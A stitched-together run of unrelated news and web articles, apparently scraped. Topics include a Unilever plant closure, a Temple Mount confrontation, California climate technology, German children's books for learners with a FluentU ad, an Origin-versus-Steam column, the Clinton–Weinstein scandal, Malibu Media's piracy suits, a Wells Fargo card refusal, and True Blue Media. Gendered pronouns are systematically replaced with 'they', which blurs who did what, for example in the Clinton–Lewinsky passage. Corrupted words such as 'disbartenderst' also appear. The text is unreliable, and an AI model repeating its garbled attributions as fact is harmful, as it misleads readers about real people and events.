“ Unfortunately , unless Canada has a substantial cost advantage or talent advantage , we 're going to be seeing more of this. ” Closure of the Unilever plant — which makes dry mix soups , sauces , sides and gravy under the Knorr and Lipton brands — will affect 280 salaried and hourly employees , the firm said in a statement released Thursday . Executive members of Local 264 of the Bakery , Confectionary & Tobacco Workers International union , which represents Unilever workers at the plant , could not be reached for comment .
Article Continued Below
The decision to close the Bramalea plant came after a strategic review of the dry mix category in North America , the company said . Most of the plant 's production is expected to finish in the fourth quarter of 2015 , with the final closure expected in March , 2016 . “ This decision was not easily made , and in no way reflects the dedication or performance of our colleagues at the Bramalea facility , ” said John Le Boutillier , president and CEO , Unilever Canada , in the release . Le Boutillier noted that during the review , “ it became apparent that a large investment was needed in the dry mix supply chain in order for Unilever to continue to deliver the highest possible quality standards , customer service levels and future packaging innovations . “ As more than 80 per cent of the volume produced at Bramalea is shipped to the United States , Unilever made the strategic decision to make its investment closer to where the bulk of the product is consumed , ” they said .
Production from Bramalea will be transferred to Unilever 's plant in Independence , Mo . “ The economies of scale argument are always strong , ” said Fraser Johnson , professor of operations management at the Ivey School of Business at the University of Western Ontario .
Article Continued Below
RELATED ON THESTAR.COM : Unilever closes Peterborough plant “ Closing the Bramalea plant is extremely difficult for the employees and for the local community . However Unilever Canada is making significant investments in Canadian facilities which manufacture ice cream , margarine and mayonnaise products , ” Le Boutillier added . Those investments include upgrades and enhancements at company plants in Simcoe and Rexdale . Unilever produces food , home and personal care products , selling everything from popsicles to Q-Tips in more than 190 countries . In Canada , the Unilever portfolio includes Axe , Becel , Ben & Jerry 's , Breyers , Dove , Hellmann 's , Klondike , St. Ives , TRESemmé , and Vaseline . Unilever is “ competing in a global industry with global brands and it has to be globally cost competitive , ” Johnson added . “ Organizations do n't tend to make these decisions on a whim. ” “ Moving production from Canada means that instead of two plants with two managers and payroll departments and all the overhead that goes along with that , you consolidate production into one facility. ” In 2010 , Unilever Canada shut down its soups manufacturing plan in Peterborough , Ont. , shedding 40 jobs . At the time , the food company employed about 1,800 people across Canada . More recently , Ontario has suffered a string of high-profile plant closures , including a Kellogg cereal plan in London , a CCL Industries aerosol plant in Penetanguishene , and a Novartis AG contact lens solution plant in Mississauga . The expected closure of the Heinz ketchup plant in Leamington was averted by a last-minute deal . Related : Unilever to close Peterborough plant More Business stories on Thestar.com
Arab list leader backs MK who harangued Jews on Temple Mount
Arab Joint List chairperson MK Ayman Odeh says their party stands firmly behind a fellow Arab lawmaker who harangued Jewish visitors on the Temple Mount today .
“ Our position is clear and uncompromising . The al-Aqsa Mosque belongs to the Muslims , and the only way to defend it is to continue our struggle for the end of the occupation and the establishment of a Palestinian state in the '67 borders whose capital is East Jerusalem , ” Odeh says in a statement Tuesday .
“ The things my friend , MK Jamal Zahalka , said today represent the position of the entire Joint List , ” they add . “ It is the government of Israel that is violating the status quo , that continues to act in the service of the settlers in what looks like a conscious attempt to incite and enflame the entire region to a religious war . ”
Zahalka took to the Temple Mount in Jerusalem Tuesday morning to confront Jewish visitors to the site , which is revered by both Muslims and Jews .
“ Crazy criminals , you 're all Kahanists , fascists , racists , get out of here , you hurt Muslims , ” they could be seen shouting at a group of Israeli Jews in video footage of the incident .
A police officer at the scene stood between Zahalka and the group , at which point the MK told him , “ Why are you letting them in ? It 's a disgrace , only to hurt Muslims ' feelings . This is not yours , get out of here , go home , you 're not wanted . ”
“ This is my home , ” Zahalka later told the group . “ You need to get out of my house . You put crazies in here . You have no god. ” They then told the police officer who was trying to calm them down that “ you , too , have no place here . ”
One of the livelier debates around climate change involves the question of technology . Do we already have the tools necessary — efficiency , solar power , nuclear , carbon capture and so on — to reduce greenhouse-gas emissions sharply enough to avoid a big rise in global temperatures ? Or will we need some new , as-yet-uninvented gizmo to get the job done ?
( David Paul Morris/Bloomberg )
So what did the final report find ? California could get awfully close — but not quite there — with existing technology . In the journal Nature , Jane Long recently summarized the CCST report 's conclusions : “ If California could quickly replace cars , appliances , boilers , buildings and power plants with today 's state-of-the-art technology , replace and expand current electricity generation with non-emitting sources and produce as much biofuel as possible by 2050 , the state could reduce emissions by a lot — by perhaps 60 percent below 1990 levels. ” Going even further than that , they write , will take big new technological breakthroughs . And Long 's essay is now provoking fierce debate among energy experts .
First , let 's put those numbers in context . If California did manage to slash emissions 60 percent below 1990 levels by 2050 , that would be a mind-boggling shift . And , as former Union of Concerned Scientists clean-energy director Alan Nogee points out , California 's per-capita emissions are already much lower than many other parts of the United States , due to scant coal use and strict building codes . There are fewer “ easy ” cuts left to make . If California can cut emissions 60 percent with existing technology , other states could presumably do more .
But why the need for new technology ? As the CCST found , the most feasible way for California to cut emissions would involve doubling its electricity use . Buildings would get heated with electricity rather than natural gas . By 2050 , some 60 percent of cars would have to be plug-ins rather than combustion-powered . And all that extra electricity would need to come from clean sources . That 's a dilemma . If the state relies too heavily on wind and solar , it 'll be difficult to balance fluctuating supplies when the wind 's not blowing or sun 's not shining . The state might have to burn natural gas to balance the load , causing it to miss its targets .
Something else will be needed . Maybe Californians will rekindle their love affair with nuclear power — the CCST found that 30 new reactors could provide two-thirds of the state 's power in 2050 , though that means figuring out how to deal with the waste and alleviate public fears . Or perhaps engineers will find a way to capture carbon-dioxide from coal and gas plants and stash it underground . But that 's still a ways off . The same goes for storage technologies and smart grids to smooth out wind and solar supplies . Solar already has a lot of potential as is — happily , electricity use tends to peak when the sun is shining — but higher levels of solar ( say ) will require new ways to store that energy for darker hours .
One other point : the CCST report explicitly ignores costs . They 're looking at what 's technically doable , not what 's cost-effective . Even though many efficiency measures can save consumers money , a low-carbon push could be pricey . New technology can help here , too . Perhaps that breakthrough will come from a researcher grinding away at a lab , as the experts in this Dot Earth forum suggest . Or , as Joe Romm argues , clean energy could become cheaper than existing technologies get widely deployed , and firms learn how to knock down costs ( notice that solar prices have plummeted in the past few years as production has ramped up ) . Either way , California 's about to put these theories to the test .
There 's a huge mistake that new language learners tend to make .
Do you know what that is ?
We try to run before we can crawl .
Unreasonably high expectations about language progress lead to unnecessary failure , disappointment , frustration .
They 're a major reason why some people abandon their language studies .
Newcomers to the German language should not expect to tackle the collected works of Goethe in the first weeks and months . Rather , dial down your expectations and give children 's books a chance !
Why Children 's Books are Great for German Learners
It is all too common to find language learners trying their skills out with material which is not made for their level . Sure , they may be feeling confident after learning German idioms , slang , and proverbs . They may be well on their way to German fluency , but there is no real “ fast lane ” to master German literature . Instead of gradually increasing comprehension , they attempt to read Kafka 's “ Metamorphosis ” after two weeks half-hardheartedly studying vocabulary .
If you are just getting started and select reading material which causes your to reach for the dictionary at every second , you will get exhausted and unwilling to continue reading practice . A much smarter approach is to progressively increase the difficulty by using material which is just a little above what you know .
For this reason , children 's books are an awesome place to start for most new German learners . While they might not be what you would usually read , there are a number of advantages to reading books intended for a much younger audience :
1 . They are easy
Books for children are intended for a group of people who just started out learning the language . Think you can identify with that ? As a consequence these books use easy vocabulary and simple language so as not to overwhelm first-time readers .
2 . They are meant for native speakers
Children in Germany actually grow up with these books . This is where they get some of their early words and sense of word order from . If it works for them , it ca n't be bad for you , right ?
3 . They are meant to be read out loud
Especially the ones for the really young are intended to be read out loud by parents . You can take advantage of this and read them out loud to yourself . That way you combine working on your reading skills with pronunciation exercise .
4 . They are often very repetitive
Books for younger children frequently repeat sentences over and over . This is good news for beginners as it means you will automatically practice the same words and grammatical structures again and again like you would with a rote repetition study approach .
Where to find children 's books in German
The big question is where to find these books . If you are not living in a German-speaking country , you wo n't always find a library carrying children 's books in your target language . Luckily there are a number of online resources where you can even score some for free .
Amazon.de – The German version of Amazon carries a wide range of books for young people , from toddlers to teenagers . International shipments make it possible to purchase them outside of Germany . Many are also available in electronic form , so if you own a Kindle you can have books delivered within seconds anywhere in the world . Plus , there are even a number of e-books available for free . Cildrenslibrary.org – The International Children 's Library is a foundation which provides access to the best children 's literature from around the world . As of this writing there are 80 German books available on the site which you can read online right away . Gutenberg.org – Project Gutenberg collects books with expired copyrights or which have become part of the public domain for others reasons and makes them available in e-book form . While the site itself is not entirely easy to use , German newspaper “ Der Spiegel ” started their own collection of Gutenberg-certified works . You can find the fairy tale section here . ChildrensBooksForever.com – This is a site by children 's books author Hans Wilhelm . They provide out-of-print editions of their and other books as free downloads in PDF form . What 's more , since their books have been translated into multiple languages , you can read the English and the German versions side by side .
15 Great German Children 's Books for Beginners
Now that you know how to find them , below is a list of children 's books in German which are excellent for learners in order of difficulty . You can move from one level to the next and gradually ramp up your reading skills .
Not all of these books are actually by German authors but all of them are had been translated and become an integral part of growing up for children in Germany . Therefore if you read these books , you get a cultural education at the same time .
Recognize this colorful little character ? This book is the German version of “ The Very Hungry Caterpillar ” by Eric Carle . It is a classic in waiting rooms of pediatrician offices . Due to the very repetitive content , it is most suited for people who have just started out learning German . In my opinion the German title is actually better than the original . Nimmersatt ( “ never satiated ” ) is definitely a great word to drop in front of a German friend who wo n't stop eating .
This book is the story of a nameless animal and its search for an identity . Since its publication in 1972 it has sold almost a million copies and has been translated into many other languages . While it uses very easy vocabulary , the book is told in the form of rhymes , presenting a bit more of a challenge to readers .
The books by author Janosch are favorites among children and adults alike . The stories are heartwarming , the illustrations adorable , and the books contain more text than the examples above . There was also an accompanying TV series of which many episodes can be found on YouTube .
The book series of farmer Petterson and their cat Findus by Swedish author Sven Nordqvist has been translated into 44 languages , German being among them . So far there are nine stories about the pair , which are slightly more elaborate and therefore told in longer text passages . Ideal for learners with a basic understanding of German .
I know Hotzenplotz is a hard word to pronounce , but do n't be put off by that . This story is another classic of German literature for children and has been turned into several movies . While it still contains a lot of illustrations , it is the first book on this list which does not rely on imagery for storytelling but instead would also work as a text-only version .
The stories about the Sams , a wondrous and loud creature which can grant wishes , and its adoptive father Herr Taschenbier is in the same category as “ Räuber Hotzenplotz. ” Images enhance the understanding , however , this is a real book . If you can finish it , you are probably ready for German middle school . And if you like it , there are six more books where this one came from .
Otfried Preußler is the author of several successful books for children of various ages . Two of their works made it on this list . “ Das kleine Gespenst ” describes the story of little ghost who wants to see daylight but ca n't seem to stay awake . It is a very cute story which was also turned into a movie in 2013 .
The eponymous little witch wants to earn the respect of the other witches so they will be allowed to fly with them on Walpurgis night . Although the story might sound infantile to grown-up ears , the language is actually quite demanding and should not be underestimated . The book , also by Otfried Preußler , has been translated into 47 languages and made it to TV screens even in Japan .
The full name of this book “ Der satanarchäolügenialkohöllische Wunschpunsch ” features the probably the longest adjective ever invented in the German language . It was written by Michael Ende and tells the story of a cat and a raven who try to prevent a pair of evil magicians from creating a potion which grants wishes ( Wunschpunsch ) for their evil purposes . The story takes place entirely on New Year 's eve from about 5:00 P.M. to midnight . Definitely worth reading !
Now we are getting into the realm of what can be considered as children 's novels . The stories about Jim Knopf and their friend Lukas are among the most successful books for young people in Germany . Millions of children have read about them and watched the accompanying TV series . Written in post-war Germany , the book contains a lot of Nazi imagery turned on its head and comments on such issues as English colonialism .
Astrid Lindgren 's novels about Pippi Longstockings are as popular in Germany as they are allover the world . Generations have grown up with the adventures of the world 's strongest girl and their friends . Apart from “ Pippi Langstrumpf , ” Lindgren authored a wide range of other books for children which make for equally good reading material .
This is the second book by Michael Ende on this list ( the other one being “ Jim Knopf ” ) . “ Momo ” is a fantasy novel about the concept of time in modern societies . The book criticizes consumerism and the stress of modern life . Published in 1973 , it foreshadowed the time deprivation which is reality for most people today . It is also a darn good read .
No list of German literature for children would be complete without author Erich Kästner . The story of Emil and their detective friends is set in pre-war Berlin , offering an interesting glimpse into German history . Kästner 's works are classics in Germany 's youth literature and several of them have been turned into movies .
The “ Inkheart ” trilogy is among the most contemporary books on this list . It is the story of a girl whose family has the gift to make characters from stories come alive by reading books out loud . It is a love letter to words and writing and their ability to create entire worlds for the reader . The book was also turned into a major motion picture .
It should n't come as a surprise , but the story of the young English wizard is one of the most popular children 's books in Germany . It is enjoyed by young and old alike . If you have graduated to reading an entire book of this series , you are well on your way to mastering German . Plus , the fact that you probably have already read the series makes it easier to get into .
And One More Thing…
Looking for more fun , authentic and addictive material for learning German ?
FluentU takes great videos and turns them into language learning experiences so that you can learn real German as people really speak it .
You can start enjoying the same content that native speakers actually watch , right now . We 've got everything from Volkswagen commercials to funny YouTube videos , scenes from “ Guardians of the Galaxy ” and the hit song “ Let It Go ” from “ Frozen . ”
Watching a fun video , but having trouble understanding it ? FluentU brings native videos within reach with interactive transcripts .
You can tap on any word to look it up instantly . Every definition has examples that have been written to help you understand how the word is used . If you see an interesting word you do n't know , you can add it to a vocab list .
And FluentU is n't just for watching videos . It 's a complete platform for learning . It 's designed to effectively teach you all the vocabulary from any video . Swipe left or right to see more examples of the word you 're on .
The best part is that FluentU keeps track of the vocabulary that you 're learning , and it recommends you examples and videos based on the words you 've already learned . This is a level of personalization that has n't been done before .
Start using FluentU on the website with your computer or tablet or , better yet , download the FluentU app from the iTunes or Google Play stores .
I am on record as saying that I would like for Steam to have a worthy rival in the digital distribution market . Nothing against them , but a little competition is good for us . The problem is , very few companies have the clout , the cash , and the connections to build a proper competitor to Steam . Microsoft does , but Games for Windows LIVE is a comprehensive failure and has been so for years . They do n't care . There are a few other smaller players who have interesting approaches to a digital marketplace ( I might talk about them in another column ) but there is n't anyone in the same weight class as Valve . So now we look to EA 's Origin service to see if they 're up to the job .
I would like to offer the following advice directly to the people running Origin , in hopes that they will bring balance to the digital market :
Dear Origin ,
For brevity , I 'm not going to pick on Origin from a technical standpoint . Yes , your game install mechanics are clunky , your system of installing DLC is reportedly horrible ( disclosure : I have n't tried it myself ) and you 're missing a lot of features that Steam users take for granted . I 'm not even going to get into detail about your creepy and borderline predatory data-harvesting . We can leave these issues for another time , because you have problems that ca n't be fixed with a simple patch .
Remember that Steam entered an empty room in 2004 . Yes , their early days were a mess of bugs and frustration . They could afford it , because they were n't facing a mature and deeply entrenched rival in the marketplace . Your customers - the people who buy EA games on the PC - already have Steam accounts . Some of them have libraries of dozens or even hundreds of games . They have friends lists and achievements and Steam is already a part of their computer . They do n't see a need for you . You have to approach them in such a way that they will be willing to set all of that aside and begin building a new library on your service .
You seem to be operating under the idea that , `` If we build it , they will come '' . The problem is , someone did build it . Seven years ago . Building it is no longer enough . Now you must build it and bribe people to show up .
The first thing you need to fix is your complete lack of a catalog . Why does Steam have Jade Empire and Knights of the Old Republic , and you do n't ? Where are the indie games ? I find it hard to believe that Electronic Arts is having this much trouble finding people interested in their digital shelf space . If someone gets out their old copy of American McGee 's Alice and discovers the disc is scratched , it 's better that they come to Origin and give you $ 5 for it , as opposed to just trading for it at a used game swap . You make a little money , and your customer becomes that much more invested in their Origin game library .
Speaking of five bucks : You really need to open up Steam during a sale and take careful notes . As of this writing , Steam has almost 600 games for under $ 5 . I could n't find any such games on Origin . ( Not saying they do n't exist , but if they do they 're rare . ) Even your really old games are sitting at a $ 20 baseline , as if you 're worried about covering the cost of printing manuals and burning discs . Start thinking digitally .
It takes willpower to avoid dropping money when I look at the Steam store , because everything is so dang cheap . I went into Origin this week specifically looking for something to buy so I could try out your service for this article , and I did n't see a single thing I wanted . I either owned it already , or you were asking way too much .
They did n't name names , but when Monica Lewinsky joined the viral online campaign against sexual harassment Sunday by retweeting # MeToo , the first person who came to mind was President Bill Clinton .
Therein lies the problem for the Clintons with the Harvey Weinstein sexual-harassment scandal : It hits perilously close to home .
Not only was Mr. Weinstein a political ally and a major donor to the Clintons and the Clinton Foundation , but their alleged sexual misconduct has refocused attention on Mr. Clinton 's own checkered past as the tide turns against powerful men who take advantage of women .
“ The question is on everyone 's lips : how could we have let Weinstein 's crimes continue for so long ? Yet there 's little in the Weinstein story—the years of whispers of impropriety , the past allegations by women , the intimate connection with a party that advertises itself as a defender of women—that does n't apply to Bill Clinton , ” said Jacobin 's Branko Marcetic .
Another connection emerged Monday with reports that Mr. Weinstein gave the maximum $ 10,000 to Mr. Clinton while they were in the White House to fund their legal defense during the independent counsel 's perjury investigation related to their relationship with Ms. Lewinsky .
They were a 22-year-old White House intern and they were commander-in-chief when they had an affair , which they later described as a “ mutual ” relationship . Another three women—Juanita Broaddrick , Paula Jones and Kathleen Willey—have accused them of sexual harassment or assault .
Other Hollywood bigwigs who helped Mr. Clinton cover the costs of their defense include Tom Hanks , Michael Douglas and Barbara Streisand , along with studio executives David Geffen and Jeffrey Katzenberg , according to the 1998 article in the Washington Post .
Mr. Katzenberg was among those in Hollywood who has denounced Mr. Weinstein after more than a dozen women accused them of sexual harassment or assault .
“ You have done terrible things to a number of women over a period of years , ” said Mr. Katzenberg in an email to Mr. Weinstein that they released Friday . “ I can not in any way say this is OK with me … It 's not at all , and I am sickened by it , angry with you and incredibly disappointed in you . ”
Other celebrities have since been accused of misconduct in what director Woody Allen—himself no stranger to sexual-abuse allegations—has warned could become a “ witch-hunt atmosphere , ” but so far Mr. Clinton has largely received a pass from Hollywood and the left .
Mr. Clinton 's name was notably missing when the feminist publication Jezebel cited “ Harvey Weinstein , Bill Cosby , Bill O'Reilly , R. Kelly , Roger Ailes , and Donald Trump ” as “ not the only men who have allegedly abused women from positions of great power . ”
One celebrity who did break ranks was chef Anthony Bourdain , who criticized Mrs. Clintons interview Thursday on CNN as “ shameful in its deflection and disingenuousness , ” sparking a backlash from Clinton supporters and aides
The right has n't held back . After actor George Clooney condemned Mr. Weinstein 's behavior by citing Mr. Ailes and Mr. Cosby , fellow actor James Woods came out swinging .
“ Did you forget President # BillClinton , George ? The power imbalance between them and a helpless intern is prima facie sexual harassment , ” said Mr. Woods , an outspoken conservative , on Twitter .
Mrs. Clinton has moved to shift attention to President Trump , telling the BBC in a Friday interview that “ we have someone admitting to being a sexual assaulter in the Oval Office . ”
Former Trump campaign manager Corey Lewandowski did n't let the comment slide , noting that Mr. Clinton ended up paying $ 850,000 to settle the Paula Jones case and resigned from the Supreme Court bar rather than face disbartenderst for lying under oath .
“ There was a sexual assaulter in the White House . They were called Bill Clinton , ” Mr. Lewandowski said on Fox News , adding , “ That 's the sexual assaulter they should be talking about in the White House . ”
Asked by the BBC about their dismissal of allegations against their husband by multiple women , Mrs. Clinton replied , “ That has all been litigated . ”
“ That was the subject of a huge investigation as you might recall in the late ‘ 90s and there were conclusions drawn . That was clearly in the past , ” they said .
In a Thursday interview , Mrs. Clinton blasted Mr. Weinstein 's alleged behavior as “ intolerable in every way , ” admitting that they would probably have considered them a friend .
The Clintons had rented a house in the Hamptons next to Mr. Weinstein 's vacation home , and Mrs. Clinton has been frequently photographed with the former head of the Weinstein Company over the years .
“ People who never spoke out before having the courage to speak out just clearly demonstrates that this behavior that they engaged in can not be tolerated , ” Mrs. Clinton told CNN 's Fareed Zakaria .
Conservative commentator Tomi Lahren accused the former First Lady of hypocrisy .
“ The funniest thing about their comment there is that they find this intolerable , ” Ms. Lahren said Sunday on Fox 's “ Watters ' World. ” “ Um , you 're still married to Bill . Apparently , you do n't find these things that intolerable . ”
Actress Alyssa Milano launched the # MeToo hashtag on Sunday , unleashing a flood of retweets from women who included stars Debra Messing and Anna Paquin , as well as liberal groups like Planned Parenthood and the Women 's March .
Also retweeting was conservative radio host Dana Loesch , who said they spent their weekend “ preparing to move due to repeated threats from gun control advocates . ”
More than a dozen women have said they were pressured for sex or harassed by Mr. Weinstein over a period spanning nearly two decades , including three who told the New Yorker 's Ronan Farrow that they raped them .
A spokesperson for Mr. Weinstein has denied allegations of “ nonconsensual sex ” and said that “ there were never any acts of retaliation against any women for refusing their advances . ”
“ Mr . Weinstein has begun counseling , has listened to the community and is pursuing a better path , ” said spokesperson Sallie Hofmeister in a statement last week .
They were expelled Saturday from the Academy of Motion Pictures Arts and Sciences , which said in a statement that it hoped to “ send a message that the era of willful ignorance and shameful complicity in sexually predatory behavior and workplace harassment in our industry is over . ”
Copyright © 2019 The Washington Times , LLC . Click here for reprint permission .
A submission to an Illinois court that was supposed to remain under seal has revealed when a leading BitTorrent troll will dismiss cases against alleged pirates . In a surprise twist the comprehensive report also reveals that Internet account holders who pass a lie detector test will be left alone .
It 's well known that while copyright trolls may suggest they are going to pursue all of their cases to the bitter end , they simply do not . Plenty of cases are dropped or otherwise terminated , although the precise reasons why this happens usually remain a closely guarded secret .
Today , however , we have a much clearer idea of what happens behind the scenes at Malibu Media , one of the main companies in the United States currently chasing down BitTorrent users for cash settlements .
The company was required by Illinois Judge Milton Shadur to submit a summary of its activities in Illinois and , as spotted by troll watcher SJD over at Fight Copyright Trolls , there was an agreement that it could remain under seal .
Somehow , however , that document has now become available on Pacer and it reveals some rather interesting details on Malibu 's operations .
Overall , Malibu Media reports that it filed cases in Illinois against 886 defendants . According to the company , just 174 have paid up so far , with 150 of those hiring a lawyer to do so .
While 100 cases are still open ( including 42 still at discovery stage and 30 in negotiations ) , for various reasons a total of 612 defendants paid nothing at all and the cases against them were dismissed . Malibu reveal the reasons for this in their filing , and they 're quite eye-opening to say the least .
Hardship
“ Hardship is when a defendant may be liable for the conduct , but has extenuating circumstances where Plaintiff does not wish to proceed against them or her , ” the Malibu document explains .
“ Examples are when a defendant has little or no assets , defendant has serious illness or has recently deceased , defendant is currently active duty US military , defendant is a charitable organization or school , etc . ”
Out of 886 defendants , Malibu reports that cases against 49 were dropped on hardship grounds .
Insufficient Evidence
It has long been said that an IP address alone is n't enough to identify an infringer and Malibu 's own submission to the court underlines this in grand fashion .
“ Insufficient evidence is defined as when Plaintiff 's evidence does not raise a strong
presumption that the defendant is the infringer or some other ambiguity causes Malibu to question the Defendant 's innocence , ” the company writes .
So , in an attempt to boost the value of the IP address evidence , Malibu says it investigates further to determine whether the account holder is in fact the infringer . The company says it looks in three areas .
1 . Length of the infringement , i.e . how long it took place , when it began , when it ended , whether it took place during the day or night , and any other patterns .
2 . Location of the residence where the infringement occurred , i.e . whether it is in a remote location or with other dwellings within wireless access range .
3 . Profiling suspected pirates using social media ( Facebook , Twitter )
The third element is of particular interest . Malibu says that since July 2012 it has been monitoring not just its own content online , but also piracy on music , movies , ebooks and software . It compares the IP addresses it spots downloading other pirate content with the IP addresses known to be infringing copyright on its own titles .
The data collected is then used to profile the person behind the IP address and this is compared with information gleaned from sites including Facebook and Twitter .
“ Oftentimes , a subscriber will publicly admit on social media to enjoying sports teams ,
music groups , or favorite TV shows . Malibu will compare their likes and interests to their [ downloads of other content ] and determine whether the interests match , ” the company explains .
So in what circumstances will Malibu dismiss a case on evidence grounds ?
In the company 's own words :
-Multiple roommates within one residence with similar profiles and interests share a single Internet connection
-The defendant has left the country and can not be located
-The results of additional surveillance do not specifically match profile interests or occupation of Defendant or other authorized users of the Internet connection
-The subscriber is a small business with public Wi-Fi access , etc
From a total of 886 defendants , cases against 259 were dropped due to insufficient evidence .
The Polygraph Defense
In the absence of any other supporting evidence , how can a subscriber prove a negative , i.e that they or they did not carry out any unlawful file-sharing ? Quite bizarrely , Malibu says that it will accept the results of a lie detector test .
“ [ M ] alibu will dismiss its claims against any Defendant who agrees to and passes a
polygraph administered by a licensed examiner of the Defendant 's choosing , ” the company told the court .
So has anyone taken the bait ? Apparently so .
“ Out of the entirety of polygraphs administered within the United States by Malibu , no Defendant has passed and all such examinations have subsequently led to the Defendant settling the case , ” Malibu writes .
No discovery
In order for Malibu to pressure account holders into settling , it first needs to find out who they are from their ISPs . Malibu 's submission reveals that this is not always possible due to :
– ISPs not retaining logging data for a long enough period
– Subpoenas being quashed due to cases being severed
– Information held on file at ISPs does not match identities of an address 's occupants
– ISP could not match the IP address with a subscriber at the time and date stipulated by Malibu
From a total of 886 defendants , cases against 304 were dropped due to failed discovery .
Cases dismissed due to settlement / actual judgments obtained
In total , 174 cases were settled by defendants without need for a trial but the amounts paid are not included in the document . However , the submission does reveal that two cases did go to court resulting in statutory damages awards of $ 26,250 and $ 15,000 respectively .
Conclusion
Malibu 's submission points to a few interesting conclusions , not least that the vast majority of their cases get dismissed for one reason or another and a significant proportion simply do not pay up .
The document also suggests that Malibu are working under the assumption that an IP address alone is n't enough to secure a settlement and that additional social media-sourced evidence is required to back it up .
This information , plus the reasons listed by Malibu for not pursuing cases , should ensure that even less people are prompted to pay up in future .
When customizing their Wells Fargo debit card online , Baltimore high school teacher Rachel Nash had several images to choose from — flowers , the American flag , colorful patterns and puppies . They even had the option of uploading their own image .
“ I do n't need extra pictures of my dog , ” Nash said . Instead , they wanted an image that would make people think , and help them show solidarity with people of color .
The 29-year-old , who works for the city public school system , designed a customized card that read “ Black Lives Matter ” with a fist held in the air , using an image they found on the internet . But Wells Fargo denied the card design , citing guidelines that prohibit political content .
When Nash first received an email last week saying their design was denied , they thought it was because the image they had used was copyrighted or trademarked — neither of which are permitted according to the Wells Fargo 's Card Design Studio guidelines . So Nash designed a similar image using the Microsoft Paint program .
Days later , their design was rejected again . This time , Nash called the bank directly to find out why , but received mixed messages , they said .
A Wells Fargo representative told Nash that the company did not want to be associated with anything “ anti-social ” or “ offensive , '' Nash said .
Rachel Nash After Baltimore high school teacher Rachel Nash 's Wells Fargo debit card design that read `` Black Lives Matter '' was declined , they designed another that read `` Black People are Important . '' The bank also declined this design , stating that it was `` political . '' After Baltimore high school teacher Rachel Nash 's Wells Fargo debit card design that read `` Black Lives Matter '' was declined , they designed another that read `` Black People are Important . '' The bank also declined this design , stating that it was `` political . '' ( Rachel Nash ) ( Rachel Nash )
Nash asked to speak to the supervisor , who told their “ Black Lives Matter ” was trademarked , which Nash knew was not true .
According to the U.S. Patent and Trademark Office , one application for “ Black Lives Matter ” and one for “ Black Lives Matter. ” ( note the period ) were submitted last year and are now pending approval . Previous applications filed in 2015 for variations of the slogan , used in protests and civil rights movements across the country , were denied .
The bank representative later said Nash 's Black Lives Matter-themed design was political in nature , Nash said , which Wells Fargo 's card design guidelines prohibits . Nash asked why their design was considered political and could n't get a straight answer , they said .
CAPTION Actor Kevin Spacey has been spotted in Baltimore recently . Scheduled to appear in court Jan. 7 in Nantucket to be arraigned on the indecent assault and battery charges , Spacey could face as many as five years in prison if convicted . Actor Kevin Spacey has been spotted in Baltimore recently . Scheduled to appear in court Jan. 7 in Nantucket to be arraigned on the indecent assault and battery charges , Spacey could face as many as five years in prison if convicted . CAPTION Dirt bike riders were seen zipping down North Monroe Street in West Baltimore and popping wheelies Tuesday while filming a movie scene . Based on a casting call posted to the Maryland Film Office 's website , it appears the “ ride scenes ” were shot for the feature film “ Charm City , ” alternately called “ 12 O'Clock Boys. ” The film will reportedly be executive produced by Will Smith and is based on the 2013 documentary “ 12 O'Clock Boys ” directed by Maryland Institute College of Art alum Lotfy Nathan . Dirt bike riders were seen zipping down North Monroe Street in West Baltimore and popping wheelies Tuesday while filming a movie scene . Based on a casting call posted to the Maryland Film Office 's website , it appears the “ ride scenes ” were shot for the feature film “ Charm City , ” alternately called “ 12 O'Clock Boys. ” The film will reportedly be executive produced by Will Smith and is based on the 2013 documentary “ 12 O'Clock Boys ” directed by Maryland Institute College of Art alum Lotfy Nathan .
They then designed another card with a black background that read “ Black People are Important . '' It , too , was denied .
“ Generally speaking , we try to err on the side of caution in determining what 's political , '' Wells Fargo spokesperson Kris Dahl told The Baltimore Sun on Tuesday . `` And essentially , we reject any cards that depict a particular political group or movement — not as a statement of acceptance or rejection of those political movements , but to keep our cards and our products politically neutral . ''
Dahl added in an email that they do not believe Wells Fargo has approved any card designs featuring Blue Lives Matter , a slogan used to support law enforcement . However , the company does offer a `` Pride '' collection of card designs supporting the LGBTQ community .
Dahl also noted that Wells Fargo offers pre-approved designs that focus on different cultures , including the “ Untold Histories '' collection , released last February during Black History Month to celebrate the African-American experience . The available images feature a boombox and an African-American family embracing .
“ We support a number of different groups as a part of our commitment to diversity and inclusion , and we do n't consider that support to be political , ” Dahl said .
Nash said they received an apology on Friday from a Wells Fargo representative who had reviewed the audio from the phone call .
“ We sincerely apologize for the initial communication to Ms. Nash because it did not correctly reflect the reason for the decline and was counter to our commitment to treating our customers with respect , '' Dahl said in an emailed statement , adding that the card 's design was rejected `` because of its political nature – not because Wells Fargo believes Black Lives Matter is offensive or anti-social , which is not the case . ”
Still , Nash said she 's disappointed that Wells Fargo sees the lives of African-Americans or human rights of any group as a political statement , `` especially when Wells Fargo is comfortable making similar shows of support for other marginalized groups . ''
`` But I 'm not necessarily surprised that this happened , and I 'm not surprised by the backlash that this limited attention has garnered , ” they said .
Since telling their story to news outlets , Nash said a number of people have vowed to change banks because of Wells Fargo 's decision . Them students have been supportive , they said , but Nash has also received several negative messages about their choice .
“ Despite the haters , good conversations are happening and productive conversations are happening , and that 's what 's important . If even one person gets it , that 's good , '' they said .
Moving forward , Nash said they are debating their options . They said that black-owned banks have reached out to them in support of helping them design a card that would reflect their views .
She 's also thinking of trying another design with Wells Fargo , enlisting one of their friends to create a thoughtful image “ that hopefully wo n't raise any red flags . ''
`` But I 'm probably just going to switch banks , to a bank that is more in line with my values , '' they said .
WASHINGTON — True Blue Media , pitching itself as the left 's answer to Breitbart , has picked an investigative reporter critical of Republicans and Wall Street Democrats alike as its new CEO .
David Sirota is leaving their role as senior investigations editor at the International Business Times to lead True Blue , which currently operates as ShareBlue and was part of a network of liberal outlets supporting Hillary Clinton 's failed presidential campaign .
The move suggests that a shattered and divided Democratic Party establishment is looking to embrace the combative , progressive wing that backed Bernie Sanders in the 2016 Democratic Primary . Sirota has been a loud critic of President-elect Donald Trump — but they do not come from Clinton 's wing of the Democratic Party , and indeed wrote a slew of stories up through the last month of the general election critical of Clinton 's ties to Wall Street .
ShareBlue is the brainchild of David Brock , the former conservative journalist turned liberal political warrior who is building a liberal fundraising and politics machine explicitly modeled on the network established by the conservative Koch brothers . After the election , Brock also told donors that they were seeking money to finance a `` Breitbart of the left , '' a phrase they modified in a speech Tuesday to the left 's `` answer to Breitbart . ''
And Sirota 's hire moves the project , in fact , out of Brock 's — and Breitbart 's — path of disciplined , intensely politicized journalism in support of the dueling 2016 campaigns and into something more independent .
